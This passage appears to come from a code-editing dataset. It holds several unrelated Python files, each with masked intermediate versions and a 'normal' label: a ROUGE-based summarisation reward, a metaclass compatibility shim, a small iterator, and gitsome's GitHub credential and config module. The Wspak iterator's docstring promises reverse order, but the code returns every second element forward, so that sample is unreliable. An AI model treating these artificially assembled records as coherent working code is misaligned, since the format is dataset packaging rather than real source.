1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-4": "from scipy.stats import rv_discrete\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom utils import *\n\n\ndef greedy_max(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n summary_representation = []\n bias = np.ones(px.shape)\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n summary_representation.append(sentence_embed[sample])\n s = torch.stack(summary_representation, 1).unsqueeze(0)\n all_sent = sentence_embed[:doc_length, :].unsqueeze(2)\n redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0\n ].cpu().numpy()\n score = lamb * px - (1 - lamb) * redundancy_score + (1 - lamb) * bias\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef greedy_nommr(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n bias = np.ones(px.shape)\n summary_representation = []\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-5": "from scipy.stats import rv_discrete\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom utils import *\n\n\ndef greedy_max(doc_length,px,sentence_embed,sentences,device,sentence_lengths,length_limit=200,lamb=0.2):\n\t'''\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t'''\n\tx = list(range(doc_length))\n\tpx = px.cpu().numpy()\n\tscore=px\n\tprob = 1\n\tsummary_representation = []\n\tbias = np.ones(px.shape)\n\tselected = []\n\twc=0\n\tlengths=[]\n\tsummary = []\n\twhile wc<=length_limit:\n\t\tsample = np.argmax(score)\n\n\t\tselected.append(sample)\n\t\twc+=sentence_lengths[sample]\n\t\tlengths.append(sentence_lengths[sample])\n\t\tsummary.append(sentences[sample])\n\n\t\tsummary_representation.append(sentence_embed[sample])\n\t\ts = torch.stack(summary_representation,1).unsqueeze(0)\n\t\tall_sent = sentence_embed[:doc_length,:].unsqueeze(2)\n\t\tredundancy_score =torch.max(F.cosine_similarity(all_sent,s,1),1)[0].cpu().numpy()\n\n\t\tscore = lamb*px - ((1-lamb)*redundancy_score) + (1-lamb)*bias\n\t\tfor i_sel in selected:\n\t\t\tscore[i_sel] = 0\n\t\t# print(len(selected))\n\tsummary ='\\n'.join(summary)\n\t# summary_representation= summary_representation.to(device)\n\treturn summary, prob, selected\n\n\ndef greedy_nommr(doc_length,px,sentence_embed,sentences,device,sentence_lengths,length_limit=200,lamb=0.2):\n\t'''\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t'''\n\tx = list(range(doc_length))\n\tpx = px.cpu().numpy()\n\tscore=px\n\tprob = 1\n\tbias = np.ones(px.shape)\n\tsummary_representation = []\n\n\tselected = []\n\twc=0\n\tlengths = []\n\tsummary=[]\n\twhile wc<=length_limit:\n\n\t\tsample = np.argmax(score)\n\t\tselected.append(sample)\n\t\twc+=sentence_lengths[sample]\n\t\tlengths.append(sentence_lengths[sample])\n\t\tsummary.append(sentences[sample])\n\n\t\tfor i_sel in selected:\n\t\t\tscore[i_sel] = 0\n\tsummary = '\\n'.join(summary)\n\treturn summary, prob, selected\n\n\ndef compute_reward(score_batch,input_lengths,output,sentences_batch,reference_batch,device,sentence_lengths_batch,number_of_sample=5,lamb=0.1):\n\treward_batch = []\n\trl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n\tfor i_data in range(len(input_lengths)):\n\t\t# summary_i = summary_embed[i_data]\n\t\tdoc_length = input_lengths[i_data]\n\t\tscores = score_batch[i_data,:doc_length]\n\t\tsentence_lengths = sentence_lengths_batch[i_data]\n\t\tsentence_embed = output[:doc_length,i_data,:]\n\t\tsentences = sentences_batch[i_data]\n\t\treference = reference_batch[i_data]\n\n\t\t# final_choice = None\n\t\tresult,prob,selected = greedy_nommr(doc_length,scores,sentence_embed,sentences,device,sentence_lengths,lamb = lamb)\n\t\treward_greedy = get_rouge_single(result,reference)\n\n\t\tresult,prob,selected = greedy_max(doc_length,scores,sentence_embed,sentences,device,sentence_lengths,lamb = lamb)\n\t\treward_hi = get_rouge_single(result,reference)\n\t\tfinal_choice = selected\n\n\t\t# print(reward_hi-reward_greedy)\n\t\treward_batch.append(reward_hi-reward_greedy)\n\t\trl_label_batch[final_choice,i_data,:] = 1\n\n\treward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n\trl_label_batch = rl_label_batch.to(device)\n\treward_batch.requires_grad_(False)\n\n\treturn reward_batch,rl_label_batch\n\n\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/python # -*- coding: utf-8 -*- import sys PY2 = sys.version_info[0] == 2 if PY2: text_type = unicode string_types = basestring, else: text_type = str string_types = str, def with_metaclass(meta, *bases): # This requires a bit of explanation: the basic idea is to make a dummy # metaclass for one level of class instantiation that replaces itself with # the actual metaclass. class metaclass(meta): def __new__(cls, name, this_bases, d): return meta(name, bases, d) return type.__new__(metaclass, 'temporary_class', (), {})
normal
{ "blob_id": "414cb9a173ac70ad9ad1fc540aec569321fd3f8b", "index": 9477, "step-1": "<mask token>\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-2": "<mask token>\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-3": "<mask token>\nPY2 = sys.version_info[0] == 2\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-4": "import sys\nPY2 = sys.version_info[0] == 2\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\n\nPY2 = sys.version_info[0] == 2\n\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n # This requires a bit of explanation: the basic idea is to make a dummy\n # metaclass for one level of class instantiation that replaces itself with\n # the actual metaclass.\n class metaclass(meta):\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
class Wspak: """Iterator zwracający wartości w odwróconym porządku""" def __init__(self, data): self.data = data self.index = -2 self.i=len(data)-1 def __iter__(self): return self def __next__(self): if self.index >= self.i: raise StopIteration self.index = self.index+2 return self.data[self.index] d=(["sdasda","sdasdasd","sdsad232","dasda","dsada"]) g=(2,3,4,6,7) d = [x for x in Wspak(d)] for x in Wspak(g): print(x) print(d)
normal
{ "blob_id": "ea1d62c4a8c406dde9bb138ee045be5e682fdbfe", "index": 566, "step-1": "class Wspak:\n <mask token>\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\n", "step-3": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\nfor x in Wspak(g):\n print(x)\nprint(d)\n", "step-4": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\nd = ['sdasda', 'sdasdasd', 'sdsad232', 'dasda', 'dsada']\ng = 2, 3, 4, 6, 7\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)\n", "step-5": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i=len(data)-1\n\n def __iter__(self):\n return self\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index+2\n return self.data[self.index]\nd=([\"sdasda\",\"sdasdasd\",\"sdsad232\",\"dasda\",\"dsada\"])\ng=(2,3,4,6,7)\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)", "step-ids": [ 2, 5, 6, 7, 8 ] }
[ 2, 5, 6, 7, 8 ]
# -*- coding: utf-8 -*- # Copyright 2015 Donne Martin. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. from __future__ import unicode_literals from __future__ import print_function import click from getpass import getpass import os import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from .compat import configparser from .lib.github3 import authorize, enterprise_login, login from .lib.github3.exceptions import AuthenticationFailed, UnprocessableEntity class Config(object): """Gitsome config. :type api: :class:`github3.github.Github` :param api: An instance of github3.github.Github. :type clr_x: str :param clr_x: Various ansi color config colors to use for highlights. :type CONFIG: str :param CONFIG: The config file name. :type CONFIG_SECTION: str :param CONFIG_SECTION: The main config file section label. :type CONFIG_CLR_X: str :param CONFIG_CLR_X: Various ansi color config labels to use for highlights. :type CONFIG_ENTERPRISE_URL: str :param CONFIG_ENTERPRISE_URL: The GitHub Enterprise url. :type CONFIG_USER_LOGIN: str :param CONFIG_USER_LOGIN: The user login. :type CONFIG_USER_PASS: str :param CONFIG_USER_PASS: The user password. :type CONFIG_USER_TOKEN: str :param CONFIG_USER_TOKEN: The user token. :type CONFIG_USER_FEED: str :param CONFIG_USER_FEED: The user feed config. This is the feed on https://github.com/ when logged in and requires the basic auth model, which doesn't work when logging in with tokens or 2FA. This config listed the pre-signed url to access the feed. :type CONFIG_URL: str :param CONFIG_URL: The config file name that contains urls used in the `gh view` command. :type CONFIG_URL_SECTION: str :param CONFIG_URL_SECTION: The config file section that contains urls used in the `gh view [url_index]` command. :type CONFIG_URL_LIST: str :param CONFIG_URL_LIST: The config containing a list of the last set of urls the user has seen, which allows the user to quickly access a repo url with the `gh view [url_index]` command. :type CONFIG_VERIFY_SSL: str :param CONFIG_VERIFY_SSL: Determines whether to verify SSL certs. :type enterprise_url: str :param enterprise_url: The GitHub Enterprise url. :type urls: list :param urls: The last set of urls the user has seen, which allows the user to quickly access a repo url with the gh view [url_index] command. :type user_login: str :param user_login: The user's login in ~/.gitsomeconfig. :type user_pass: str :param user_pass: The user's pass in ~/.gitsomeconfig. This is only stored for GitHub Enterprise users since using only a personal access token does not seem to be supported. :type user_token: str :param user_token: The user's token in ~/.gitsomeconfig. :type verify_ssl: bool :param verify_ssl: Determines whether to verify SSL certs. """ CONFIG = '.gitsomeconfig' CONFIG_CLR_PRIMARY = 'clr_primary' CONFIG_CLR_SECONDARY = 'clr_secondary' CONFIG_CLR_TERTIARY = 'clr_tertiary' CONFIG_CLR_QUATERNARY = 'clr_quaternary' CONFIG_CLR_BOLD = 'clr_bold' CONFIG_CLR_CODE = 'clr_code' CONFIG_CLR_ERROR = 'clr_error' CONFIG_CLR_HEADER = 'clr_header' CONFIG_CLR_LINK = 'clr_link' CONFIG_CLR_LIST = 'clr_list' CONFIG_CLR_MESSAGE = 'clr_message' CONFIG_CLR_NUM_COMMENTS = 'clr_num_comments' CONFIG_CLR_NUM_POINTS = 'clr_num_points' CONFIG_CLR_TAG = 'clr_tag' CONFIG_CLR_TIME = 'clr_time' CONFIG_CLR_TITLE = 'clr_title' CONFIG_CLR_TOOLTIP = 'clr_tooltip' CONFIG_CLR_USER = 'clr_user' CONFIG_CLR_VIEW_LINK = 'clr_view_link' CONFIG_CLR_VIEW_INDEX = 'clr_view_index' CONFIG_SECTION = 'github' CONFIG_USER_LOGIN = 'user_login' CONFIG_USER_PASS = 'user_pass' CONFIG_USER_TOKEN = 'user_token' CONFIG_USER_FEED = 'user_feed' CONFIG_ENTERPRISE_URL = 'enterprise_url' CONFIG_VERIFY_SSL = 'verify_ssl' CONFIG_URL = '.gitsomeconfigurl' CONFIG_URL_SECTION = 'url' CONFIG_URL_LIST = 'url_list' CONFIG_AVATAR = '.gitsomeconfigavatar.png' def __init__(self): self.api = None self.user_login = None self.user_pass = None self.user_token = None self.user_feed = None self.enterprise_url = None self.verify_ssl = True self.urls = [] self._init_colors() self.load_configs([ self.load_config_colors, ]) self.login = login self.authorize = authorize self.getpass = getpass def _init_colors(self): """Initialize colors to their defaults.""" self.clr_primary = None self.clr_secondary = 'green' self.clr_tertiary = 'cyan' self.clr_quaternary = 'yellow' self.clr_bold = 'cyan' self.clr_code = 'cyan' self.clr_error = 'red' self.clr_header = 'yellow' self.clr_link = 'green' self.clr_list = 'cyan' self.clr_message = None self.clr_num_comments = 'green' self.clr_num_points = 'green' self.clr_tag = 'cyan' self.clr_time = 'yellow' self.clr_title = None self.clr_tooltip = None self.clr_user = 'cyan' self.clr_view_link = 'magenta' self.clr_view_index = 'magenta' def authenticate_cached_credentials(self, config, parser, enterprise_auth=enterprise_login): """Authenticate with the user's credentials in ~/.gitsomeconfig. :type config: str :param config: The config path. :type parser: :class:`ConfigParser.RawConfigParser` :param parser: An instance of `ConfigParser.RawConfigParser. """ with open(config) as config_file: try: parser.read_file(config_file) except AttributeError: parser.readfp(config_file) self.user_login = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_LOGIN) self.user_pass = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_PASS) self.user_token = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_TOKEN) self.enterprise_url = self.load_config( parser=parser, cfg_label=self.CONFIG_ENTERPRISE_URL) self.verify_ssl = self.load_config( parser=parser, cfg_label=self.CONFIG_VERIFY_SSL, boolean_config=True) self.user_feed = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_FEED) if not self.verify_ssl: # The user has chosen not to verify SSL certs. # Disable warnings related to this option. requests.packages.urllib3.disable_warnings( InsecureRequestWarning) login_kwargs = { 'username': self.user_login, 'two_factor_callback': self.request_two_factor_code, } if self.enterprise_url is not None: self.login = enterprise_auth login_kwargs.update({ 'url': self.enterprise_url, 'verify': self.verify_ssl, }) if self.user_token is not None: login_kwargs.update({'token': self.user_token}) elif self.user_pass is not None: login_kwargs.update({'password': self.user_pass}) else: self.print_auth_error() return else: login_kwargs.update({'token': self.user_token}) self.api = self.login(**login_kwargs) def authenticate(self, enterprise=False, enterprise_auth=enterprise_login, overwrite=False): """Log into GitHub. Adapted from https://github.com/sigmavirus24/github-cli. :type enterprise: bool :param enterprise: Determines whether to configure GitHub Enterprise. Default: False. :type overwrite: bool :param overwrite: indicates whether we cant to overwrite the current set of credentials. Default: False. """ if self.api is not None and not overwrite: return # Get the full path to the configuration file. config = self.get_github_config_path(self.CONFIG) parser = configparser.RawConfigParser() # Check to make sure the file exists and we are allowed to read it. # Skip if we want to overwrite the auth settings. if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK) and \ not overwrite: with open(config) as config_file: try: parser.read_file(config_file) except AttributeError: parser.readfp(config_file) self.authenticate_cached_credentials(config, parser) else: # The file didn't exist or we don't have the correct permissions. login_kwargs = { 'two_factor_callback': self.request_two_factor_code, } if enterprise: self.login = enterprise_auth while not self.enterprise_url: self.enterprise_url = input('Enterprise URL: ') if click.confirm('Do you want to verify SSL certs?', default=True): self.verify_ssl = True else: self.verify_ssl = False login_kwargs.update({ 'url': self.enterprise_url, 'verify': self.verify_ssl, }) while not self.user_login: self.user_login = input('User Login: ') login_kwargs.update({'username': self.user_login}) if click.confirm(('Do you want to log in with a password [Y] or ' 'a personal access token [n]?'), default=True): user_pass = None while not user_pass: user_pass = self.getpass('Password: ') login_kwargs.update({'password': user_pass}) try: if not enterprise: # Trade the user password for a personal access token. # This does not seem to be available for Enterprise. auth = self.authorize( self.user_login, user_pass, scopes=['user', 'repo'], note='gitsome', note_url='https://github.com/donnemartin/gitsome', two_factor_callback=self.request_two_factor_code ) self.user_token = auth.token else: self.user_pass = user_pass except (UnprocessableEntity, AuthenticationFailed): click.secho('Error creating token.', fg=self.clr_error) click.secho(('Visit the following page and verify you do ' 'not have an existing token named "gitsome":\n' ' https://github.com/settings/tokens\n' 'If a token already exists, update your ' '~/.gitsomeconfig file with your token:\n' ' user_token = TOKEN\n' 'You can also generate a new token.'), fg=self.clr_message) self.print_auth_error() return else: # The user has chosen to authenticate with a token. while not self.user_token: self.user_token = input('Token: ') login_kwargs.update({'token': self.user_token}) self.api = self.login(**login_kwargs) if self.user_feed: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self.user_feed) def check_auth(self): """Check if the current authorization is valid. This method uses the ratelimit_remaining api to check whether the currently authenticated user's credentials are valid without deducting from the rate limit. The ratelimit_remaining api does not seem to be available for GitHub Enterprise. github3.py's method check_authorization seems to only work given an authorization created by a registered application. TODO: Determine a better way to check the authorization for GitHub Enterprise. :type enterprise: bool :param enterprise: Determines whether we are authenticating with GitHub Enterprise. """ if self.enterprise_url is not None: return True try: if self.api is not None: # Throws AuthenticationFailed if invalid credentials but # does not deduct from the rate limit. self.api.ratelimit_remaining return True else: self.print_auth_error() except AuthenticationFailed: self.print_auth_error() return False def get_github_config_path(self, config_file_name): """Attempt to find the github config file. Adapted from https://github.com/sigmavirus24/github-cli. :type config_file_name: str :param config_file_name: The config file name. :rtype: str :return: The github config file path. """ home = os.path.abspath(os.environ.get('HOME', '')) config_file_path = os.path.join(home, config_file_name) return config_file_path def load_config(self, parser, cfg_label, default=None, color_config=False, boolean_config=False): """Load the specified config from ~/.gitsomeconfig. :type parser: :class:`ConfigParser.RawConfigParser` :param parser: An instance of `ConfigParser.RawConfigParser`. :type cfg_label: str :param cfg_label: The config label to load. :type default: str :param default: The default color if no color config exists. Default: None. :type color_config: bool :param color_config: Determines whether this is a color config. Default: False. :type boolean_config: bool :param boolean_config: Determines whether to load a boolean config. Default: False. """ try: if boolean_config: cfg = parser.getboolean(self.CONFIG_SECTION, cfg_label) else: cfg = parser.get(self.CONFIG_SECTION, cfg_label) if color_config: if cfg == 'none': cfg = None # Check if the user input a valid color. # If invalid, this will throw a TypeError click.style('', fg=cfg) except (TypeError, configparser.NoOptionError): return default return cfg def load_configs(self, config_funcs): """Load the specified config from ~/.gitsomeconfig. :type foo: list :param foo: The config methods to run. """ config_file_path = self.get_github_config_path(self.CONFIG) parser = configparser.RawConfigParser() try: with open(config_file_path) as config_file: try: parser.read_file(config_file) except AttributeError: parser.readfp(config_file) for config_func in config_funcs: config_func(parser) except IOError: # There might not be a cache yet, just silently return. return None def load_config_colors(self, parser): """Load the color config from ~/.gitsomeconfig. :type parser: :class:`ConfigParser.RawConfigParser` :param parser: An instance of `ConfigParser.RawConfigParser`. """ self.load_colors(parser) def load_colors(self, parser): """Load all colors from ~/.gitsomeconfig. :type parser: :class:`ConfigParser.RawConfigParser` :param parser: An instance of `ConfigParser.RawConfigParser`. """ self.clr_primary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_PRIMARY, default=self.clr_primary, color_config=True) self.clr_secondary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_SECONDARY, default=self.clr_secondary, color_config=True) self.clr_tertiary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TERTIARY, default=self.clr_tertiary, color_config=True) self.clr_quaternary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_QUATERNARY, default=self.clr_quaternary, color_config=True) self.clr_bold = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_BOLD, default=self.clr_bold, color_config=True) self.clr_code = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_CODE, default=self.clr_code, color_config=True) self.clr_code = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_ERROR, default=self.clr_code, color_config=True) self.clr_header = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_HEADER, default=self.clr_header, color_config=True) self.clr_link = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_LINK, default=self.clr_link, color_config=True) self.clr_list = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_LIST, default=self.clr_list, color_config=True) self.clr_message = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_MESSAGE, default=self.clr_message, color_config=True) self.clr_num_comments = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_NUM_COMMENTS, default=self.clr_num_comments, color_config=True) self.clr_num_points = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_NUM_POINTS, default=self.clr_num_points, color_config=True) self.clr_tag = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TAG, default=self.clr_tag, color_config=True) self.clr_time = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TIME, default=self.clr_time, color_config=True) self.clr_title = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TITLE, default=self.clr_title, color_config=True) self.clr_tooltip = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TOOLTIP, default=self.clr_tooltip, color_config=True) self.clr_user = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_USER, default=self.clr_user, color_config=True) self.clr_view_link = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_VIEW_LINK, default=self.clr_view_link, color_config=True) self.clr_view_index = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_VIEW_INDEX, default=self.clr_view_index, color_config=True) def load_urls(self, view_in_browser): """Load the current set of urls from ~/.gitsomeconfigurl. :type view_in_browser: bool :param view_in_browser: Determines whether to view the urls in a browser. :rtype: list :return: Collection of urls. """ config = self.get_github_config_path(self.CONFIG_URL) parser = configparser.RawConfigParser() with open(config) as config_file: try: parser.read_file(config_file) except AttributeError: parser.readfp(config_file) urls = parser.get(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST) urls = urls.strip() excludes = ['[', ']', "'"] for exclude in excludes: urls = urls.replace(exclude, '') if not view_in_browser: urls = urls.replace('https://github.com/', '') return urls.split(', ') def print_auth_error(self): """Print a message the authorization has failed.""" click.secho('Authentication error.', fg=self.clr_error) click.secho(('Update your credentials in ~/.gitsomeconfig ' 'or run:\n gh configure'), fg=self.clr_message) def prompt_news_feed(self): """Prompt the user to enter a news feed url.""" if click.confirm(('No feed url detected.\n Calling gh events without ' "an argument\n displays the logged in user's " 'news feed.\nDo you want gitsome to track your ' 'news feed?'), default=True): click.secho(('Visit the following url while logged into GitHub:\n' ' https://github.com\n' 'Enter the url found under "Subscribe to your ' 'news feed".'), fg=self.clr_message) self.user_feed = '' while not self.user_feed: self.user_feed = input('URL: ') def request_two_factor_code(self): """Request two factor authentication code. Callback if two factor authentication is requested. :rtype: str :return: The user input two factor authentication code. """ code = '' while not code: code = input('Enter 2FA code: ') return code def save_config(self): """Saves the config to ~/.gitsomeconfig.""" if self.check_auth(): config = self.get_github_config_path(self.CONFIG) parser = configparser.RawConfigParser() parser.add_section(self.CONFIG_SECTION) parser.set(self.CONFIG_SECTION, self.CONFIG_USER_LOGIN, self.user_login) if self.user_token is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_TOKEN, self.user_token) if self.user_feed is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self.user_feed) if self.enterprise_url is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_ENTERPRISE_URL, self.enterprise_url) if self.user_pass is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_PASS, self.user_pass) else: parser.remove_option(self.CONFIG_SECTION, self.CONFIG_USER_PASS) parser.set(self.CONFIG_SECTION, self.CONFIG_VERIFY_SSL, self.verify_ssl) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_PRIMARY, self.clr_primary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_SECONDARY, self.clr_secondary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TERTIARY, self.clr_tertiary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_QUATERNARY, self.clr_quaternary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_BOLD, self.clr_bold) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_CODE, self.clr_code) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_ERROR, self.clr_error) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_HEADER, self.clr_header) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LINK, self.clr_link) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LIST, self.clr_list) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_MESSAGE, self.clr_message) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_COMMENTS, self.clr_num_comments) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_POINTS, self.clr_num_points) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TAG, self.clr_tag) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TIME, self.clr_time) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TITLE, self.clr_title) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TOOLTIP, self.clr_tooltip) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_USER, self.clr_user) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_LINK, self.clr_view_link) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_INDEX, self.clr_view_index) with open(config, 'w+') as config_file: parser.write(config_file) def save_urls(self): """Save the current set of urls to ~/.gitsomeconfigurl.""" config = self.get_github_config_path(self.CONFIG_URL) parser = configparser.RawConfigParser() try: parser.add_section(self.CONFIG_URL_SECTION) except configparser.DuplicateSectionError: pass parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls) with open(config, 'w+') as config_file: parser.write(config_file) def show_bash_completions_info(self): """Show info on how to enable bash completions""" click.secho(('By default, gitsome looks at the following locations ' 'to enable bash completions:\n' ' https://github.com/donnemartin/gitsome/blob/master/xonsh/environ.py#L123-L130\n' # NOQA 'If bash completions are not working for you, check out ' 'the following link:\n' ' https://github.com/donnemartin/gitsome#enabling-bash-completions'), # NOQA fg=self.clr_message)
normal
